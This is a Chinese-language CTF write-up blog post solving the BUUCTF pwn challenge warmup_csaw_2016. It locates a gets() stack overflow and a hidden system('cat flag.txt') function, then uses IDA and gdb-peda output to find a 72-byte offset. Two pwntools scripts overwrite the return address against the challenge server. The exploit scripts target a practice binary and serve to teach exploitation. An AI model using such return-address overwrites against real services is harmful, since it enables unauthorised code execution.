标签：AA 函数 pwn3 记录 gdb 0x40 第二天 pwn

buuctf_pwn

1.25

warmup_csaw_2016

法一：

用file命令查看文件

拖到ida,发现了gets(v5)， v5 的长度只有 0x40，即可用栈大小只有64字节

和上一个题rip一样，gets()函数并没有限制输入，利用gets函数栈溢出。按Shift + F12，看一下字符串。

发现cat flag.txt，虽然没有 /bin/sh，可以获得权限。但是这个足够拿到flag了。双击进去，发现在sub_40060D这个函数里面。

查看这个函数，就是想要的 system(“cat flag.txt”)

且sub_40060D()函数的起始地址为0x40060D。

点击main函数中gets存放输入数据的变量v5，查看其地址和空间大小。

可见其空间大小为40字节，s到r是存放rip地址。r就是存返回地址并进行返回。

v5大小为0x40，s到r有0x8，也就是需要注入(0x40 + 0x8)字节的数据，并在最后输入地址运行想要运行的函数。

exp：

from pwn import *
# remote()建立远程连接,指明ip和port
io = remote('node4.buuoj.cn', 26694)
payload = b'a'*(0x40 + 0x8) + p64(0x40060D)
io.sendline(payload) #发送数据
io.interactive() #与shell进行交互

法二：

对其进行 gdb调试，得到偏移量。

─ gdb pwn3      
GNU gdb (GDB) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from pwn3...
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in pwn3)
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/vconlln/Desktop/buupwn/testpwn/pwn3 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
-Warm Up-
WOW:0x40060d
>AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffda30 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
RBX: 0x7fffffffdb88 --> 0x7fffffffdf6d ("/home/vconlln/Desktop/buupwn/testpwn/pwn3")
RCX: 0x7ffff7f709c0 --> 0xfbad2288 
RDX: 0x1 
RSI: 0x1 
RDI: 0x7ffff7f72960 --> 0x0 
RBP: 0x4141334141644141 ('AAdAA3AA')

得到RBP寄存器中 'AAdAA3AA' 。往该字符串后，随便复制一串，进行偏移量计算：

gdb-peda$ pattern offset IAAeAA4AAJAAf
IAAeAA4AAJAAf found at offset: 72

exp:

from pwn import *

p = remote('node4.buuoj.cn', 27643)
payload = b'x' * 72 + p64(0x40060D)
p.sendline(payload)

p.interactive()

标签：AA,函数,pwn3,记录,gdb,0x40,第二天,pwn
From： https://www.cnblogs.com/vconlln/p/17067423.html

记录打pwn的第二天

buuctf_pwn

1.25

warmup_csaw_2016

法一：

法二：

相关文章

赞助商

阅读排行